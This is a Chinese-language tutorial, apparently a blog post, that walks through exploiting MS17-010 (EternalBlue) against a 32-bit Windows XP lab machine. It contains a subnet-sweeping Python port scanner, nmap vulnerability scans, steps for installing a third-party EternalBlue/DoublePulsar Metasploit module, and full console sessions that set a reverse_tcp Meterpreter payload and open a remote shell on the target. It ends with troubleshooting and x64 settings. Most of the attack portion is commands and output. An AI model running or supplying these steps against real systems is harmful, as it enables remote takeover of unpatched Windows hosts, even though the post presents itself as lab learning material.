ms17-010 漏洞復現-主要用來學習交流(32位系統)
文章目錄
一.漏洞原理
1.簡介
- 永恆之藍漏洞是方程式組織在器漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞導致攻擊者在目標系統上可以執行任意代碼.
- 注: SMB服務的作用:該服務在Windows與unix系列OS之間搭起一座橋樑,讓兩者的資源可互通有無,SMB服務詳解:點擊查看
2.漏洞原理代碼詳解
下面兩篇文章從實際代碼詳細分析了漏洞原理
- http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
- https://blog.csdn.net/qq_27446553/article/details/73480807
二.漏洞復現
1.目標信息收集
- 通過Python腳本
自己編寫Python 端口掃描腳本, 掃描445端口來收集目標
我這裏推薦我自己隨便用的多線程端口掃描腳本代碼
import telnetlib
import threading
import time
import queue
class PortScan(threading.Thread):
def __init__(self,que,port_runner):
threading.Thread.__init__(self)
self.port_runner = port_runner
self.que = que
def scan_thread ( self ,Ip_Port) :
ip_port = Ip_Port.split(":")
ip = ip_port[0]
port = ip_port[1]
server = telnetlib.Telnet ( )
try :
server.open ( ip , port )
self.port_runner.port_threadLock.acquire ( )
print ( Ip_Port)
self.port_runner.port_threadLock.release ( )
except Exception as err :
pass
finally :
server.close ( )
def run(self):
while not self.que.empty ( ) :
ip = self.que.get()#取ip和端口
self.scan_thread(ip)
#print(ip)
class ThreadClass():
def run( self ):
ports = input("請輸入端口號:")
port_thread_count = int(input("請輸入線程數:"))
port_threads = [ ]
self.port_threadLock = threading.Lock ( )
port_Queue = queue.Queue ( )
for x in range ( 1 , 255 ) :
for y in range ( 1 , 255 ) :
host = "192.168.{}.{}".format ( x , y )
port_Queue.put ( host + ":" + ports )
for i in range (port_thread_count ) :
port_threads.append ( PortScan (que = port_Queue ,port_runner=self ) )
print ( '[*]Starting port_scan thread...' )
for i in range ( port_thread_count ) :
port_threads [ i ].start ( )
for i in range ( port_thread_count ) :
port_threads [ i ].join ( )
print ( "port_scan_test end of run" )
if __name__ == '__main__':
scan = ThreadClass()
scan.run()
- 使用nmap掃描
在msf也可以使用nmap進行掃描進行信息收集,示例如下:
掃描版本服務
msf5 auxiliary(scanner/smb/smb_ms17_010) > nmap -sV 192.168.242.133
[*] exec: nmap -sV 192.168.242.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-12 18:23 CST
Nmap scan report for 192.168.242.133
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:03:4D:C3 (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
若掃描出來有可能存在的漏洞的服務,可以search 該服務,查看可以利用的攻擊模塊
這裏從收集信息來看目標主機445端口開放,可以嘗試使用ms17-010(永恆之藍)來攻擊
- 使用nmap 腳本來掃描是否存在ms17-010漏洞
nmap --script=vuln targetip
C:\Users\admin\Desktop>nmap --script=vuln 192.168.242.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-12 17:22 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.242.133
Host is up (0.0028s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:03:4D:C3 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor:
| VULNERABLE:
| Double Pulsar SMB Backdoor
| State: VULNERABLE
| Risk factor: HIGH CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
| The Double Pulsar SMB backdoor was detected running on the remote machine.
|
| Disclosure date: 2017-04-14
| References:
| https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
| https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_ https://github.com/countercept/doublepulsar-detection-script
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 37.88 seconds
2. 嘗試攻擊
2.1. 查看漏洞模塊 search ms17-010
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
可以看到有auxiliary(輔助)模塊和exploit(攻擊)模塊
2.2. 可以先使用輔助模塊來掃描測試 auxiliary/scanner/smb/smb_ms17_010
我們這裏掃描192.168.242.100-140之間的目標
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.242.100-140
rhosts => 192.168.242.100-140
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 30
threads => 30
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[*] 192.168.242.100-140:445 - Scanned 9 of 41 hosts (21% complete)
[*] 192.168.242.100-140:445 - Scanned 23 of 41 hosts (56% complete)
[*] 192.168.242.100-140:445 - Scanned 26 of 41 hosts (63% complete)
[*] 192.168.242.100-140:445 - Scanned 30 of 41 hosts (73% complete)
[*] 192.168.242.100-140:445 - Scanned 31 of 41 hosts (75% complete)
[+] 192.168.242.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[!] 192.168.242.133:445 - Host is likely INFECTED with DoublePulsar! - Arch: x86 (32-bit), XOR Key: 0x8CC07018
[*] 192.168.242.100-140:445 - Scanned 33 of 41 hosts (80% complete)
[*] 192.168.242.100-140:445 - Scanned 34 of 41 hosts (82% complete)
[*] 192.168.242.100-140:445 - Scanned 35 of 41 hosts (85% complete)
[*] 192.168.242.100-140:445 - Scanned 37 of 41 hosts (90% complete)
[*] 192.168.242.100-140:445 - Scanned 41 of 41 hosts (100% complete)
[*] Auxiliary module execution completed
可以看到 192.168.242.133 很容易受到ms17-010的攻擊, 並幫我們探測出操作系統版本,以方便我們後續選擇操作系統目標參數
2.3 使用攻擊模塊來進行攻擊
我們攻擊是32位系統,目前msf還沒有收錄該攻擊模塊,我們需要網上下載攻擊模塊並拷貝到對應位置
下載安裝模塊
下載github項目 項目地址將下載下來的Eternalblue-Doublepulsar-Metasploit-master的名字改爲Eternalblue-Doublepulsar-Metasploit並將改完名後的整個目錄複製到root目錄下
或者用git下載
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
然後將下載的
eternalblue_doublepulsar.rb,拷貝到 /usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下
也有可能是/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/目錄
root@kali:~# cd Eternalblue-Doublepulsar-Metasploit/
root@kali:~/Eternalblue-Doublepulsar-Metasploit# cp eternalblue_doublepulsar.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/
可能會缺少架構支持,所以我們需要安裝多架構支持,所以安裝 win32
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
使用攻擊模塊
msf5 >reload_all //更新模塊
msf5 > use exploit/windows/smb/eternalblue_doublepulsar //加載模塊
// 查看支持的操作系統
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show targets
Exploit targets:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
1 Windows Server 2003 SP0 (x86)
2 Windows Server 2003 SP1/SP2 (x86)
3 Windows Server 2003 (x64)
4 Windows Vista (x86)
5 Windows Vista (x64)
6 Windows Server 2008 (x86)
7 Windows Server 2008 R2 (x86) (x64)
8 Windows 7 (all services pack) (x86) (x64)
// 設置操作系統,剛剛信息收集的時候顯示windows 5.1 那麼我們這裏選擇XP
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set target 0
target => 0
//設置options
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.168.242.133 //靶機
//加載payload
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.168.242.131 //設置監聽
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe //修改注入進程
// 查看配置
msf5 exploit(windows/smb/eternalblue_doublepulsar) > show options
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue
PROCESSINJECT explorer.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOSTS 192.168.242.133 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
w
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.242.131 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP (all services pack) (x86) (x64)
//開始攻擊
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[*] 192.168.242.133:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.242.133:445 - Launching Eternalblue...
0024:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
000d:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
[+] 192.168.242.133:445 - Backdoor is already installed
[*] 192.168.242.133:445 - Launching Doublepulsar...
[*] Sending stage (180291 bytes) to 192.168.242.133
[*] Meterpreter session 4 opened (192.168.242.131:4444 -> 192.168.242.133:1034) at 2019-12-12 19:25:16 +0800 //攻擊成功,反彈會話
0024:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
000d:err:xrandr:xrandr12_init_modes Failed to get primary CRTC info.
[+] 192.168.242.133:445 - Remote code executed... 3... 2... 1...
meterpreter > sysinfo
Computer : ADMIN-F0F09A0D3
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:03:4d:c3
MTU : 1500
IPv4 Address : 192.168.242.133
IPv4 Netmask : 255.255.255.0
說明:經Github項目中介紹,如果explorer.exe測試失敗,可以改用processinject參數爲lsass.exe等
如果攻擊失敗的話看看問題總結,有沒有你所遇到的問題
三. 問題總結
問題一
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[-] 192.168.242.133:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
[*] Exploit completed, but no session was created.
原因:這個因爲沒有/root/.wine目錄,執行以下命令即可創建該目錄
wine cmd.exe
問題二
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-AKQxPKi0-1576151848632)(07D5BFE40EDF49DBB42835CB108DFCE8)]](https://pic1.xuehuaimg.com/proxy/csdn/https://img-blog.csdnimg.cn/20191212200426946.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMwMzAyNTc3,size_16,color_FFFFFF,t_70)
原因:wine在使用過程中會出現圖形化界面,這就需要這個基於Mozilla的Gecko渲染引擎來呈現,手動安裝所需版本的wine-gecko即可。我們首先下載Wine提供的MSI二進制文件,請注意下載32位版本的,因爲我們安裝的是wine32
解決辦法:
wget https://dl.winehq.org/wine/wine-gecko/2.44/wine_gecko-2.44-x86.msi
安裝wine-gecko
wine msiexec /i wine_gecko-2.44-x86.msi
或者執行之前的命令
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
問題三
原因:這個是由於環境變量導致的,我們需要重新設置環境變量,默認的是64位,修改爲32位的。執行以下命令設置環境變量
env WINEPREFIX=$HOME/.wine32 WINEARCH=win32 winecfg
問題四
解決方法:安裝時安裝了wine-gecko庫以後就沒有出現這個錯誤了,所以如果出現這個錯誤,請參考問題二
問題五(主要問題):
[-] Handler failed to bind to 192.168.1.211:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 192.168.1.132:445 - Generating Eternalblue XML data
[*] 192.168.1.132:445 - Generating Doublepulsar XML data
[*] 192.168.1.132:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.132:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.132:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.1.132:445 - Are you sure it's vulnerable?
[*] 192.168.1.132:445 - Launching Doublepulsar...
[-] 192.168.1.132:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
原因: 可能目標不可達,或者防火牆,殺軟原因
問題六
[-] Handler failed to bind to 10.20.80.80:7666:- -
[*] Started reverse TCP handler on 0.0.0.0:7666
[*] 10.50.2.253:445 - Generating Eternalblue XML data
[*] 10.50.2.253:445 - Generating Doublepulsar XML data
[*] 10.50.2.253:445 - Generating payload DLL for Doublepulsar
[*] 10.50.2.253:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.50.2.253:445 - Launching Eternalblue...
[+] 10.50.2.253:445 - Pwned! Eternalblue success!
[*] 10.50.2.253:445 - Launching Doublepulsar...
[-] 10.50.2.253:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
原因:可能安裝了補丁導致的
注:[-] Handler failed to bind to 192.168.242.131:4444:- -這個問題查看一下自己的IP有沒有錯,端口有沒有被佔用,被佔用的話更改一下監聽端口就好了
問題七
如果找不到dll文件,可能是你把Eternalblue-Doublepulsar-Metasploit-master拖動到kali裏時漏了裏面的一些文件,拖完之後一定要和原文件比對一下
問題八
wmsf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.242.131:4444
[*] 192.168.242.133:445 - Generating Eternalblue XML data
[*] 192.168.242.133:445 - Generating Doublepulsar XML data
[*] 192.168.242.133:445 - Generating payload DLL for Doublepulsar
[*] 192.168.242.133:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.242.133:445 - Launching Eternalblue...
[+] 192.168.242.133:445 - Backdoor is already installed
[*] 192.168.242.133:445 - Launching Doublepulsar...
[+] 192.168.242.133:445 - Remote code executed... 3... 2... 1...
這種情況就是快成功了,更改一下processinject 或者多攻擊幾次看看
四. 如果使用該模塊攻擊win7x64注意事項:
如果靶機是64,還需要設置其他配置:
(1)在exploit/windows/smb/eternalblue_doublepulsar模塊中
set PROCESSINJECT lsass.exe
與
set TARGETARCHITECTURE x64
(2)設置payload ,因爲是64位所以需要設置64位的,否則無法獲取反彈
set payload windows/x64/meterpreter/reverse_tcp
參考鏈接:
https://blog.csdn.net/userpass_word/article/details/85124266
https://bbs.ichunqiu.com/thread-23005-1-1.html
https://blog.csdn.net/qq_41617034/article/details/91051614
東拼西湊系列
